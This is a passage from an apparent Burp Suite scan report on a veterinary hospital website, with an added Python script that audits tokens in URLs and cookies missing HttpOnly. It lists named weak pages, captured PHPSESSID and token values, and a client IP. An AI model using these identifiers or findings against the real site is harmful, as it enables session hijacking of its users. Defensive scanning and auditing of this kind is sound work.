<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

4.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d17
3.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWin
dows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:45:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

5. Cookie without HttpOnly flag set
There are 6 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
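The two findings that make up sections 4 and 5 of this report are mechanical enough to check outside the scanner. The Python below is an added example, not part of the Burp report and not code from the scanned site: it runs the section 4 check (a session-like value carried in the URL query string) and the section 5 check (a Set-Cookie header without HttpOnly) over evidence copied from instances 4.3 and 5.3, and then shows what the corrected Set-Cookie header looks like. The request line is shortened from the report (empty and nested parameters dropped) and the response headers are the five relevant ones from 5.3; the length and entropy thresholds and the name hints are this example's own heuristics, not Burp's rules.

```python
"""Audit of the two session-handling findings in this report, run over the
captured evidence.  Added example; not part of the Burp report and not the
scanned site's code."""
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed from the report: request line of instance 4.3 / 5.3 with the
# empty and nested parameters dropped, and the response headers of 5.3.
SAMPLE_REQUEST_LINE = (
    "GET /main/offer?addr=&city=&date=1307084400&formtype=CORP"
    "&guid=B5F701EB-EA95-422D-924E-BCD921689D1E&ipaddress=173.193.214.243"
    "&submit=Get+FREE+Coupon&token=595ca47f74a6874c96fd2cb4b94d5da9"
    "&tollfree=866-825-8416&zip= HTTP/1.1"
)
SAMPLE_RESPONSE_HEADERS = [
    "HTTP/1.1 200 OK",
    "Server: Apache/2.2.15 (Win32) PHP/5.2.14",
    "Set-Cookie: PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/",
    "Cache-Control: no-store, no-cache, must-revalidate",
    "Content-Type: text/html",
]

# Heuristics (this example's assumptions, not Burp's exact rules): a value is
# "session-like" if it is long and high-entropy, or if its name hints at one.
MIN_TOKEN_LEN = 16
MIN_TOKEN_ENTROPY = 3.0          # bits per char; 32-char hex tokens score ~3.5
SESSION_NAME_HINT = re.compile(r"sess|token|sid|auth|guid", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character of s; random hex sits near 4, English words far lower."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def looks_like_token(name: str, value: str) -> bool:
    long_random = len(value) >= MIN_TOKEN_LEN and shannon_entropy(value) >= MIN_TOKEN_ENTROPY
    return long_random or bool(value and SESSION_NAME_HINT.search(name))


def tokens_in_query(request_line: str):
    """Section 4 check: session-like values carried in the request URL's query
    string.  Anything here lands in server and proxy logs, browser history and
    the Referer header of every outbound request (4.3 shows exactly that)."""
    _method, target, _version = request_line.split(" ", 2)
    return [(name, value)
            for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True)
            if looks_like_token(name, value)]


def parse_set_cookie(value: str):
    """Split 'NAME=val; attr; attr=val' into (name, val, {attr_lower: attr_val})."""
    first, *rest = [p.strip() for p in value.split(";")]
    name, _, val = first.partition("=")
    attrs = {}
    for p in rest:
        k, _, v = p.partition("=")
        if k.strip():
            attrs[k.strip().lower()] = v.strip()
    return name.strip(), val.strip(), attrs


def audit_cookies(headers, https=False):
    """Section 5 check: Set-Cookie headers without HttpOnly (and, on an HTTPS
    site, without Secure).  Returns (cookie_name, missing_flags, session_like)."""
    findings = []
    for line in headers:
        field, _, value = line.partition(":")
        if field.strip().lower() != "set-cookie":
            continue
        name, val, attrs = parse_set_cookie(value)
        missing = [flag for flag, key in (("HttpOnly", "httponly"), ("Secure", "secure"))
                   if key not in attrs and (https or key != "secure")]
        if missing:
            findings.append((name, missing, looks_like_token(name, val)))
    return findings


def harden_set_cookie(value: str, https=False) -> str:
    """The fix on the wire: same cookie, same attributes, plus HttpOnly (and
    Secure when served over TLS).  Idempotent."""
    _, _, attrs = parse_set_cookie(value)
    out = value.strip().rstrip(";")
    if "httponly" not in attrs:
        out += "; HttpOnly"
    if https and "secure" not in attrs:
        out += "; Secure"
    return out


if __name__ == "__main__":
    for name, _ in tokens_in_query(SAMPLE_REQUEST_LINE):
        print(f"session-like token in URL query string: {name}")
    for name, missing, session_like in audit_cookies(SAMPLE_RESPONSE_HEADERS):
        print(f"cookie {name} missing {', '.join(missing)}"
              + (" (looks like a session token)" if session_like else ""))
    weak = SAMPLE_RESPONSE_HEADERS[2].partition(":")[2].strip()
    print("before:", weak)
    print("after: ", harden_set_cookie(weak))
```

Run against the sample, the query check flags guid and token (the 32-character hex token is what section 4 is about; the GUID is a second candidate worth reviewing), and the cookie check flags PHPSESSID as a session cookie missing HttpOnly. The corrected header is the same cookie with "; HttpOnly" appended. For the PHP/5.2.14 build advertised in the Server header, that is session.cookie_httponly = 1 in php.ini (the setting exists from PHP 5.2.0) or session_set_cookie_params() before session_start(). Secure is only asserted when https=True, since every capture in this report is over plain http://. Note that no cookie flag helps the section 4 finding: the token parameter has to leave the URL altogether, into the POST body (as the thank-you.html request in 4.5 partly does) or into a cookie.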



5.1. http://www.vcahospitals.com/hanson/appt.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hanson/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhan
son%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526ti
me1%253d%2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

5.2. http://www.vcahospitals.com/hanson/offer.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526to
ken%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

5.3. http://www.vcahospitals.com/main/offer

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:03:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

5.4. http://www.vcahospitals.com/main/offer/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:13:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...

5.5. http://www.vcahospitals.com/main/offer/thank-you.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dC